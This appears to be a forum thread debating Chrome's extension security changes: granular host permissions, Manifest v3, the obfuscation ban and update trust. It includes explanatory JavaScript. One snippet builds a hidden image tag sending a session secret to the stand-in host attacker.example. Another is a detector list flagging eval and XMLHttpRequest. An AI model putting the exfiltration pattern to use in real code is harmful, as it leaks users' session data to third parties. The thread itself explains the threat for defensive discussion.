Chrome’s auto-update forces you to trust the author of any extension you install for as long as you use the extension. Google’s “Trustworthy by default” effort doesn’t change this model since it still provides no guarantees. This works for some extensions backed by companies (e.g. Adblock), but it doesn’t work for extensions that add simple functionality.
For small extensions that add basic browser functionality (e.g. reorder tabs, enable autocomplete), I wish Google would enable users to verify open-source extensions. I trust the version of the code that I have reviewed on github. I do not trust that the kid who wrote this extension won’t go rogue and upload a malicious version in a future autoupdated release. So the only way I can verify the code that I run is to install it from the Chrome Web Store, copy the code and verify it, uninstall the Chrome Web Store version, and then load the unpacked extension (or even publish my own copy of it to the Chrome Web Store). This is pretty cumbersome.
Chrome's auto-update forces you to trust the author of an extension until it requests more permissions, at which point the extension is automatically disabled and the user is prompted to accept the new permissions to re-enable the extension.
Making the permissions as fine-grained as possible - as Google is doing here - is a good way to limit the damage an extension can do if it turns malicious in the future.
The solution to that is to only request permissions when they're needed, and to give users prominent options to grant access "only once" or to revoke access (both of which should be undetectable by extensions without extra work).
This isn't perfect, but it comes with some advantages. It's more work for an extension author to check for the permissions than to just write their application logic normally. This means that the lazy authors start coding their apps correctly (just try to do the thing and let the OS handle asking for permission), and only the malicious authors are left nagging for permissions early.
If you have more legitimate than malicious apps on your platform, you can at least sort of train users to see what the malicious apps are doing as weird. If most of your apps don't ask for permissions up front, then the ones that do start to look weirder.
If I go to a website, and a permission pops up asking to access my webcam, and I didn't do something to make that permission pop up... that is really weird and I'm going to click 'no'. And when I click no, if the website wants to be cranky about it, they have to write extra code to hide whatever content is already loaded and pop up a dialog complaining. If I click OK and then immediately click a button and revoke that permission, they need to have even more code continually running in the background to detect it.
Again, it's not hard for a malicious extension/app to do that, it's just that only the malicious extensions/apps are going to do that. So it becomes easier to educate users with simple rules like, "if a site asks for a permission that's unrelated to what you're doing, always say no." It also becomes easier for users who are already careful about permissions to be paranoid and grant them carefully, because they don't have to decide up-front whether the app is worth installing -- they can decide later on whether or not they trust it to have access to something.
Part of having fine-grained permissions is getting rid of what I call the Terms of Service model, where you just stick anything you might ever want inside a manifest and then users either accept everything or the app doesn't install.
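The "just try to do the thing and let the browser handle asking" pattern described above is how the web's getUserMedia API already works: no up-front manifest entry, the prompt appears at the moment of use, and a denial surfaces as a rejected promise. A sketch (the `mediaDevices` parameter is only there so the sketch can run outside a browser):

```javascript
// Request webcam access only at the moment the feature is used. The
// browser shows its own permission prompt; the app just handles denial.
async function startWebcam(videoElement, mediaDevices = navigator.mediaDevices) {
  try {
    const stream = await mediaDevices.getUserMedia({ video: true });
    videoElement.srcObject = stream; // prompt already handled by the browser
    return true;
  } catch (err) {
    // User clicked "no" (NotAllowedError) or there's no camera:
    // degrade gracefully instead of nagging with extra dialogs.
    console.log("webcam unavailable:", err.name);
    return false;
  }
}
```

The extra code a site would need to detect a later revocation is exactly the "cranky" work described above - the default, lazy path is the well-behaved one.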
> Again, it's not hard for a malicious extension/app to do that, it's just that only the malicious extensions/apps are going to do that. So it becomes easier to educate users with simple rules like, "if a site asks for a permission that's unrelated to what you're doing, always say no."
Are you sure it's this simple? Adblockers and password managers, for example, require wide-ranging permissions to work, and there are plenty of popular extensions in the same situation.
Password managers don't need extensive permissions, they just need a built-in autofill API. Similarly, you could implement a basic adblocker via a declarative content blocking API.
Fine-grained permissions will allow for this sort of thing.
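To make that concrete, a declarative content-blocking rule might look something like this. These field names are hypothetical, not a real Chrome API; the point is that the extension declares its intent up front and the browser does the blocking, so the extension never needs to read pages or network traffic:

```javascript
// Hypothetical sketch of a declarative content-blocking rule set.
// The extension hands these rules to the browser once, instead of
// running its own code against every page.
const blockingRules = [
  {
    id: 1,
    action: { type: "block" }, // drop matching requests entirely
    condition: {
      urlFilter: "||ads.example.com^",    // placeholder ad host
      resourceTypes: ["script", "image"], // only these request types
    },
  },
];

console.log(blockingRules[0].action.type); // "block"
```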
Does that cover the functionality of most popular extensions though? When there's an API that matches up with the purpose of the extension, it's more straightforward. I would have thought the popularity of those particular example extensions is what partially drove the creation of those APIs as well.
The APIs I mentioned in my previous comment don't exist yet. My point is that Google is going to need to _build_ APIs to fulfill all of the most common use cases (including those ones) in order to succeed in their goal of making extension permissions more fine-grained.
So yes, the functionality of most popular extensions will be covered by the new APIs, because Google will be designing the new APIs with those popular extensions in mind.
It does, and many extensions on the store already request huge blanket permission sets they don't need. The UI flow for requesting a new permission with an update is awful to the point that many users never even notice it, so you really should just request every possible permission when you first release your extension.
They need to fix the UX here and it doesn't seem like they intend to.
I think most rogue extensions arise from malicious players buying popular extensions and then uploading nefarious new versions. In other words, the original authors do not necessarily have an incentive to request as many permissions as possible.
This is also a good point. There's the related problem of the extension author selling the extension to a shady company for some extra bucks, who then pushes out an auto-installing update bundling it with malware/adware.
You are not the majority of users, though, who lack the ability to check an extension's code to vet it. That would be a huge feature to build for a small number of users, and I bet you would suffer from review fatigue reading every update to every extension. This was the problem with many Greasemonkey scripts, and it's why addons/extensions are king.
You cannot read all the code of all the extensions you use, and if you are a 'regular user', you shouldn't, but you can trust some power users, researchers, and developers who have read the code of a particular version of a particular extension.
All that is needed is some infrastructure for that. You could even tune what percentage of the people you trust must have audited a new version of an extension before it is automatically updated for you.
It doesn't actually have to be an anonymous audit process. Most people in the security industry have names, and, you know, they use extensions too, so they usually read the code anyway. All we need is a checkbox where they can 'ack' a version.
To get the arrangement you describe would require Google to voluntarily give up some of its current control over Chrome (or for Chrome users to switch to another browser).
So if you can't ask the downloader to verify the code, and extension developers can put almost whatever they want on your browser, what are you supposed to do? Just trust randoms to not infect your computer intentionally or neglectfully?
Unless there's another option, I agree with the OP of this thread. Not allowing a 'locked dependency' type of mechanism for extensions continues to be very dangerous.
Alternate idea: Google can take responsibility for software they are distributing in a more serious manner.
One thing you can do to mitigate risk is to disable any extension you aren't actively using day to day and only turn them on when you need them. If an extension goes rogue it will then hopefully be detected before you activate it again.
The process you described feels like it could be handled with some automation...at least the cumbersome parts. Could even version control what you've verified in your own repo.
Now that modern operating systems come bundled with antivirus and complicated kernel security techniques, and, most of all, because the Web is winning and most of our computer interaction is through a web browser, browser extensions are a prime place for malware to enter someone's PC. Both Mozilla and Google have not given them enough attention. It's good to see this taking place. I can understand the concerns about walled gardens and so on, but I think that's just a pill you have to swallow. If you want to use a self-loaded extension, that's still available, and you'll always be able to find a Chromium build that allows it if that's very important to you. For most people, it's not a big concern.
All that being said, there's still so much that Chrome needs to fix when it comes to extensions. Extension updates are done in a very opaque way. Extensions that alter network requests have precedence based on their install order --- and there's no clean way for two extensions to really coordinate between each other. This means that HTTPS Everywhere and Decentraleyes and uBlock conflict with one another, and the solution might be to uninstall and reinstall them in a different order. That is clearly insanity. What happens when you login to Chrome on a new machine and your extensions are pulled in, is the install order guaranteed to match your previous machine?
There's also no centralized storage for extensions, which means that settings are generally going to be completely different between machines unless the extension implements its own syncing/backup code.
There's also no way to disable an extension on one machine without disabling it on another machine. That means that if you want an app on your Chromebook, it's gotta be on your desktop as well.
> browser extensions are a prime place for malware to enter someone's PC. Both Mozilla and Google have not given it enough attention.
Well, Firefox switched to WebExtensions for security reasons and received a lot of flak because of it. So I'd say the opposite: Mozilla pushed this hard and is still working on better support.
> there's no clean way for two extensions to really coordinate between each other
I don't think something like this should be allowed, could be abused. Instead browsers should embrace the fact that they've become operating systems inside operating systems and implement some of the most used extensions natively.
I completely agree about extension settings sync though, it's a major PITA across all browsers, not just Chrome.
While fine-grained extension sync isn't an option in Chrome, it's certainly possible to run different extensions on different machines using the same Google login - simply disable the extension sync once you have your "basic" set of extensions.
Centralized storage is an optional but fully functional API in Chrome extensions. Many extensions simply opt not to use it for whatever reasons. (I'm not sure if the storage synchronizing also gets disabled by disabling the syncing of extensions. This should be made more clear, along with fine-grained extension synchronization.)
But yes, there needs to be some kind of solution to the install order issue of the network request API. I don't know why this hasn't been addressed yet.
This is great. Extensions have long been a weak point in the web security model, since many extensions currently require what is essentially the web equivalent of root privileges (UXSS) in order to function. It's good to see Google finally doing something to try to remedy this.
I'm not sure how much this will help to be honest. I haven't looked into the stats for this, but a huge number of popular and useful extensions require access to reading/writing data to all domains to function so users just get used to this being a standard permission they have to allow.
One tip I suggest though: Create one locked down profile in Chrome that you use for email, banking etc. and a separate profile that you can be less careful about installing extension in. Extensions in the second profile won't have access to your browsing activity in the first profile. I have a profile I use for web development for example which I install lots of extensions to that require access to everything.
The new user controls are just a temporary stopgap measure. The real solution Google is working towards is Manifest v3, which will be designed as a much better system with fine-grained permissions.
If Google follows the model with Chrome that they did with Android, UXSS permissions will eventually be phased out over time and replaced with better, more secure, opt-in, purpose-built APIs in Chrome. (Assuming they can do that without sacrificing _too_ much functionality.)
Almost nobody makes well thought out decisions when agreeing to permissions during the extension install process.
EULAs, Terms of Service, Mobile Apps, Cookie Consents have boy-who-cried-wolf'ed everyone except the most paranoid and tech-savvy to the point that they are mostly ignored.
Stop taking away people's locks just because other people don't use them.
Yes, many non-technical users do not pay attention to permissions. But permissions are extremely helpful to people who do use them -- and the number of people who do use them is larger than the number of people who audit source code or set up VMs.
Educating normal users to pay attention to permissions is a problem. It is a separate problem from "do they even have tools in the first place if they want to use them." The problem I want solved is how I verify that an extension is safe. Granular extension permissions solve that problem for people like me.
After that problem is solved, then I can worry about educating my friends and family.
It would be nice, too, if the user were put first and foremost, and had to give each fine-grained permission approval before it could be used for the first time. And if the user denied any of those permissions, the app would continue to function (either because that's a requirement for being listed in the store, and/or because the framework sends randomized data to the app on the user's behalf).
Yes, this is how Android and the Web in general handle permissions. I haven't yet seen what Google is planning for Manifest v3, but I suspect it will use a permissions system built around a similar model, with users getting explicit opt-in prompts for each permission the extension requires. (Though I'm not 100% sure of that yet, it's possible that sort of permissions system might not be practical for browser extensions for reasons I haven't anticipated.)
"Starting today, Chrome Web Store will no longer allow extensions with obfuscated code...Ordinary minification, on the other hand, typically speeds up code execution as it reduces code size, and is much more straightforward to review. Thus, minification will still be allowed"
I have a Chrome extension that uses Webpack to convert TypeScript to JavaScript which then uses UglifyJS to minify it. If I submit only the minified code, is this compliant?
On Firefox the reviewer took my source code, inc package.json, and ran it through the exact same version of my dependencies and then did a checksum of the output against what I submitted. The reviewer also read my source code and reviewed all dependencies.
It was a pain to get through but doing good things for your users takes effort.
Is it correct that Firefox makes your extension live in a short time after you upload it as long as you pass some automated checks? But it can get taken down if it fails the review performed by a human later?
Yes, they're not banning minified code, only obfuscated code. Read a bit further:
> Ordinary minification, on the other hand, typically speeds up code execution as it reduces code size, and is much more straightforward to review. Thus, minification will still be allowed
It's not clear to me where the line between obfuscation and minification is here. Minification is a form of obfuscation. Transpilation and minification also make code significantly harder to review compared to the original code, so I'm not following the rationale behind this.
Minification typically means "the minimum amount of code changes needed to make code as small as possible".
Obfuscation is more like the maximum amount of code changes possible while keeping semantics.
Writing an unminifier is pretty feasible and the only real trouble with reading the resulting code is the meaningless variable names. Writing a deobfuscator is intentionally hard.
Why "minimum amount of code changes"? I would have thought the goal of minification would be to make the code as small as possible even if it requires a lot of changes.
> Writing an unminifier is pretty feasible and the only real trouble with reading the resulting code is the meaningless variable names.
Reviewing code with meaningless variable names is still several orders of magnitude harder than reviewing the original code, though. I agree that code run through an obfuscator is another step up, however.
A minifier will not make changes that are not required. In fact a lot of the more obscure changes can still be easily detected by code and reversed. Eg most minifiers will turn
if(hello) {
alert("hi");
}
into
hello&&alert("hi");
That seems cryptic to the untrained reader. But you can probably imagine writing an unminifier that can detect that the result of that expression is not assigned to anything and that the && is only used for lazy evaluation. This means that you could restore the original "if". Now note that the only reason you can do this is because minifiers follow this same pattern all the time. Every if with a small body is minified in this same way. Unminifiers know the patterns that minifiers use and reverse them where possible. It's pretty fun to do actually.
An obfuscator, on the other hand, will try to vary the patterns by which code is changed as much as possible, and as randomly as possible. Depending on a random seed, the same if might be turned into
var b=52,w="toString",h=History;
(((hello==(b-51))||(!b))&&(()=>alert(h[w].call(h).substr(9,2)))())
This is a lot harder to turn back into that if, and essentially impossible for reviewers to follow. A good static analysis tool could probably do some flow analysis and derive that hello is checked for truthiness, the !b check is superfluous and the function expression is immediately invoked, and still restore that if. But real decent obfuscators can do similar static analysis and have access to much more data, by definition (especially if the input code is typed). Eg it would use existing variables in scope that it knows are truthy/falsy/etc and needlessly add them to checks (maybe even bring them into scope from elsewhere). The more code you have, the better you can obfuscate it. Writing a good obfuscator is hard (writing a shitty one is peanuts and a lot of fun), but writing a useful deobfuscator that can handle non-shitty obfuscators is nearly impossible.
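The pattern-reversal idea for minified (not obfuscated) code can be shown with a toy example. A real unminifier works on an AST rather than regexes, and handles many patterns; this sketch only reverses the single `cond&&call();` form discussed above:

```javascript
// Toy unminifier: detect the `<identifier>&&<expression>;` statement form
// a minifier emits for a small if-body, and rewrite it back into an if.
function unminifyAndPattern(line) {
  // e.g. matches: hello&&alert("hi");
  const m = line.match(/^(\w+)&&(.+);$/);
  if (!m) return line; // not a recognized minifier pattern; leave as-is
  return `if (${m[1]}) {\n  ${m[2]};\n}`;
}

console.log(unminifyAndPattern('hello&&alert("hi");'));
// if (hello) {
//   alert("hi");
// }
```

This only works because minifiers are deterministic and use the same handful of transformations every time; an obfuscator deliberately breaks that assumption.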
> Reviewing code with meaningless variable names is still several orders of magnitude harder than reviewing the original code though.
Automated checking tools don't really care about human-friendly function names. They will, however, check for calls to dangerous APIs (eg: XMLHttpRequest(url), eval(stuff)) and some dangerous patterns (eg: background actions unprompted by the user).
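A minimal sketch of that kind of check. Real store review tooling parses the code rather than grepping it, and the pattern list here is purely illustrative:

```javascript
// Toy static check: flag source code that calls APIs commonly abused
// by malicious extensions.
const DANGEROUS_PATTERNS = [
  { name: "eval", re: /\beval\s*\(/ },                           // arbitrary code execution
  { name: "Function constructor", re: /\bnew\s+Function\s*\(/ }, // eval in disguise
  { name: "XMLHttpRequest", re: /\bXMLHttpRequest\b/ },          // possible exfiltration
];

function flagDangerousCalls(source) {
  return DANGEROUS_PATTERNS.filter(p => p.re.test(source)).map(p => p.name);
}

console.log(flagDangerousCalls("eval(stuff)"));       // [ 'eval' ]
console.log(flagDangerousCalls('console.log("hi")')); // []
```

Minified code with mangled variable names defeats none of this, which is exactly why minification can stay allowed while obfuscation (which hides the calls themselves) cannot.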
>Why "minimum amount of code changes"? I would have thought the goal of minification would be to make the code as small as possible even if it requires a lot of changes.
You're agreeing. Minification makes things as small as possible. No one said otherwise. The "minimum amount of code changes" could very well be "a lot of changes".
The difference is whether your goal is to make the code impossible to reverse engineer, or if you're just trying to reduce the size or improve the performance of the final deliverable.
The blog post explicitly calls out all of the following techniques as acceptable, for example:
> * Removal of whitespace, newlines, code comments, and block delimiters
I read the post but seeing as the penalty for not following the guidelines is your extension being removed from the store and not all minifiers work the same way I thought some clarification would help.
This seems like a great effort. However, I worry what this means for the future of WebAssembly inside of extensions. There's an undeniable advantage to being able to write extensions in languages other than JavaScript. AgileBits has been writing the 1Password X extension in Go, compiled to JS. While the JS isn't obfuscated per se, it's also not very readable.
I hope they can find a path forward that doesn't kill off extensions like 1Password X.
I think some more granularity in permissions wrt how extensions may change websites would be useful too.
For example, it would be easy for Google/Mozilla/etc to compile a list of HTML tags and attributes that can never be used to inject javascript. Lots of "HTML sanitization" libraries do this, for instance. Then, we could get permissions like "remove content", "inject non-interactive content" and "inject interactive content". An ad blocker, for instance, should work with no network access whatsoever and should never need to inject code. So I can totally lock it down to not being able to do anything except replace ads by empty <div> tags.
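Concretely, such a locked-down ad blocker's entire content script could be as small as this sketch (the selectors are illustrative, and the `doc` parameter exists only so the sketch can run outside a browser):

```javascript
// Ad blocker under a hypothetical "remove content / inject
// non-interactive content" permission: swap known ad containers for
// inert empty <div>s. No network access, no scripts, no event handlers.
const AD_SELECTORS = [".ad-banner", "[data-ad-slot]"];

function replaceAds(doc) {
  let replaced = 0;
  for (const sel of AD_SELECTORS) {
    for (const el of doc.querySelectorAll(sel)) {
      el.replaceWith(doc.createElement("div")); // inert placeholder
      replaced++;
    }
  }
  return replaced;
}
```

Nothing in that code could exfiltrate data even if the author turned malicious, which is the whole point of scoping the permission that narrowly.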
I think there's an opportunity for browser builders here with more granular permissions in other areas too (eg "network access but only to domains x and y", which ofc only makes sense if you can't also inject arbitrary interactive content, but ok). No user is of course ever going to read those, or understand which combination of permissions make sense, but a Google reviewer can. Then the reviewer no longer needs to review whether the code does something bad, but only whether the requested permissions would _allow_ the code to do something bad, and whether the permissions make sense for what the extension is supposed to be doing.
Eg LastPass ought to work just fine with only "access to *.lastpass.com" plus "inject only non-interactive content".
This could be particularly powerful if browser designers would create a way for extensions to show possibly-interactive content on the top/left/side/bottom of the page (in a popover bar for instance) that is clearly not part of the page DOM. Then, LastPass can remove their "click to auto-fill" icons inside user/pass forms and replace them by a "That looks like a login form. Do you want to auto-login?" popover bar with an ok button. The UX is still great, security is greatly improved.
I don't pretend to be smarter than the teams that build browsers, so I may be missing something. Nevertheless right now I think that this, combined with the feature announced in this post where extensions can be locked down to specific websites, will remove the need for nearly any "can change anything on any website and do anything with it" extensions (which are pretty much the norm right now). Gmail extension? Website-specific. Pinterest "pin it" button? Non-interactive (make the injected button just be a selector and show the final "pin selected images" action in a popover bar). HN-Submit? Non-interactive. And so on.
A lot of that functionality is already possible through Declarative Content[1] and Optional Permissions[2]. These remove the need for extensions to have permissions to all websites, while enabling them to be given permission to a site after installation. However, these features weren't part of the original APIs, so I think a lot of extension developers aren't familiar with them, don't want to refactor their existing codebases to support these features, or are targeting multiple browsers where other browsers don't support this functionality.
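For example, with Optional Permissions an extension can defer asking for host access until the user actually invokes the feature. `chrome.permissions.request` is a real API; the origin here is a placeholder, and the manifest would list it under `"optional_permissions"` rather than `"permissions"`:

```javascript
// Request host access at the moment of use instead of at install time.
// Manifest prerequisite (placeholder host):
//   "optional_permissions": ["https://*.example.com/*"]
function requestSiteAccess(onDecision) {
  chrome.permissions.request(
    { origins: ["https://*.example.com/*"] },
    function (granted) {
      // granted === false if the user dismissed or declined the prompt
      onDecision(granted);
    }
  );
}
```

Because the prompt only appears in response to a user action, it arrives with context - the user just clicked the thing that needs the access - which is much easier to reason about than an install-time wall of warnings.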
Overall this looks great, but I wonder whether extensions will be allowed that are written in compiled languages? Dart, Go (via GopherJS), Kotlin, and so on? Is WebAssembly supported?
Can't answer whether they will, but in theory they could. Allow devs to upload their source, then using reproducible builds and/or cloud builds, verify that the supplied source compiles down to the submitted binary.
So by default Chrome extensions will still be able to access any domain they've asked for permission to in their manifest (which can include all domains), but users can optionally restrict this? Is this really going to help non-technical users much?
Not at first. The real benefit to non-technical users will come once Google starts using this system to pressure extension developers to migrate to newer APIs with more limited permissions.
Right now, as you say, only power users will use this feature. But once suitable alternative permissions are available for the more common use cases, Google will start to transition to "When you click the extension" as the default setting, which will put pressure on affected extension developers to migrate to the new permissions systems to avoid unnecessary friction for their users.
My question is: how is this activated? I fear it will be based on a left click of the extension's icon, which is normally used for popup.html; if it's a right click, the issue is alleviated.
Any updates like these are appreciated since I've all but stopped using extensions, and would like to start using them again one day. I don't think the current system, with messages in the UI like "read/change all data on all sites you visit", is acceptable in the current 2018 environment. I feel like a default-deny-all policy and a (user-friendly) way to review what data/URLs an extension is accessing is needed. There currently is too much trust involved, and it seems like it shouldn't be needed. One idea is for Chrome to provide the extension with a sandboxed, virtual DOM API that doesn't pass any user-identifiable data. The extension registers with Chrome the functionality it provides, like "fill the main password field with this string", and Chrome executes that action internally. It can never request user/history/etc data, just provide functionality to a black box.
Can someone explain to me why it isn't possible to simply give users the option to influence whether an extension can make a request to a remote server?
This way one could simply disallow extensions from doing anything that isn't happening locally.
It's trickier than it seems. To take just one example, suppose you have an extension that modifies pages to insert a related link (e.g. an extension that tries to infer a hacker news user's reddit account and link to it from their HN profile page).
The extension needs permission to modify documents on the hacker news domain. But if it can insert an <a> tag, what's to stop it from inserting an invisible <img href> tag, which could be used to exfiltrate data? Or even just inserting an <a> tag with an onClick handler, or a javascript: url?
Right - or even trickier... Imagine Google manages to block extensions from inserting <img> tags that reference other domains as a way of exfiltrating data... There are so many other ways to do it:
Say you have an extension that ONLY wants access to mail.google.com. It might feel safer because it can't load in any third party scripts. But it can just as easily SEND data from your account as an email which it promptly deletes.
Same goes for LinkedIn, Facebook, HN, any interactive website can be used to exfiltrate data.
When an extension has the ability to inject arbitrary JS into a page, it's not easy to determine whether any given request is being triggered by the host page or by the extension.
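To make the threat above concrete: an extension that can only "insert markup" can still exfiltrate, because an `<img>` src fires a network request all by itself. A sketch (attacker.example is a placeholder domain):

```javascript
// Illustration of the exfiltration channel described above: no <script>,
// no onClick handler -- just a 1x1 tracking image whose URL carries the
// stolen data as a query parameter.
function buildExfilMarkup(secret) {
  return '<img src="https://attacker.example/log?d=' +
    encodeURIComponent(secret) + '" width="1" height="1">';
}

console.log(buildExfilMarkup("session=abc123"));
// <img src="https://attacker.example/log?d=session%3Dabc123" width="1" height="1">
```

Distinguishing that request from one the host page made itself is exactly the attribution problem that makes per-request user controls so hard to build.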
One thing that I'd like to see is mandatory code signing, so that even in the event of a compromised developer account it's not possible for an update to be pushed out unless the attacker also has the signing key.
Ad blockers will continue to function as they currently do. However, users may need to explicitly grant ad blockers access to all hosts if this feature is implemented with default-deny.
I would like to know more about the review methodology and when the review is triggered. If I ask for wide permissions, get them, and then sell my extension to a malicious third party, what triggers the review?
I like the host access restriction policy they describe. I update and fix existing extensions for customers, and about 90% of the time the previous author has requested unnecessary permissions and URL access.
For context, I have an extension designed for a single html5 game, with roughly ~80k weekly active users. I've been using the chrome web store to deploy and update it for about 2 years, and recently wrote my own installer after Google stopped me from issuing security updates for over a month. I also had to build my own configuration update system to enable me to disable features on an hour's notice due to the security update incident & Chrome taking over a day to install updates - I'm serving about 3GB of configuration and update data per day right now, at around 1kb/user/hr.
Lots of functionality (and thus current extensions) requires requesting blanket access to all websites so they have a big task ahead of them trying to get all those extensions to comply.
In general the way things work for Chrome Extensions right now is bad for users and downright hostile to developers. Because I actually followed best practices on extension permissions I got a lot of confused, paranoid users, and had to explain Google's awful permissions model and UI in detail: https://www.reddit.com/r/Granblue_en/comments/86bdmo/psa_vir...
If I had simply requested a large set of blanket permissions when I first created the extension, I would've saved myself a huge amount of effort.
Users having the choice to scope wildcards down to specific pages is a start but until it's a default it isn't really a meaningful improvement for anyone because few people are qualified to actually set those restrictions properly. The design of the extension API itself tends to require wildcards to provide functionality due to limitations in the other APIs. For example, if you want to do anything fancy with web requests and do it performantly, you may need to inject JS directly into webpages - the background-page-based webRequest API is slow and missing key features.
There's also a risk here that by trying to kludge better access controls into the existing full-of-holes extension model, Google is going to break tons of extensions that ordinary users rely on and they're going to be too frustrated by this to be happy about any security upside.
Some genuinely good changes though:
* Requiring 2FA to deploy extension updates. This is a big vulnerability in the existing system, especially if an extension has many users. It's been exploited in the past.
* Service worker support (probably) - the current model with page/content/background scripts and popup pages is a nightmare both to author and debug, hopefully service workers will provide a better way to architect all of this.
* Narrowly scoped declarative APIs - hopefully this means extension developers can finally get access to smaller features without having to request access to the entire universe. Some of the feature scoping is really absurd and occasionally unrelated APIs are tucked under a larger permission in a way that really confuses users. As I explained to users in my old reddit comment above, Google currently uses "Access your browsing history" to describe an ENORMOUS set of unrelated features.
* Blocking obfuscated JS - this literally will do nothing to protect users, but it's worth denying it anyway. There's no good reason to obfuscate extension JS since it's so hard to debug extensions you didn't write anyway. It's possible this will make it easier for them to apply machine learning to identify malicious extension code, at least, but I bet the machine learning will just randomly reject updates to legitimate extensions without any explanation and you'll be screwed.
The big wildcard here is Google's history of failing to maintain or properly document extension APIs. They're going to be rearranging lots of existing stuff and adding new stuff, so the underlying mess will probably become 10x worse. Core APIs like notifications have been entirely or partially broken for years with no effort made to fix them or update docs. Inertia is one of the main things carrying the chrome extension ecosystem forward and it's possible many extension developers will churn out after they find the migration effort involved here too much, similar to how Firefox lost many extensions during their two transitions (old->multiprocess compatible->webextensions)
Reposting this comment as I think it’s relevant at the top level.
On Firefox the reviewer took my source code, inc package.json, and ran it through the exact same version of my dependencies and then did a checksum of the output against what I submitted. The reviewer also read my source code and reviewed all dependencies.
It was a pain to get through but doing good things for your users takes effort.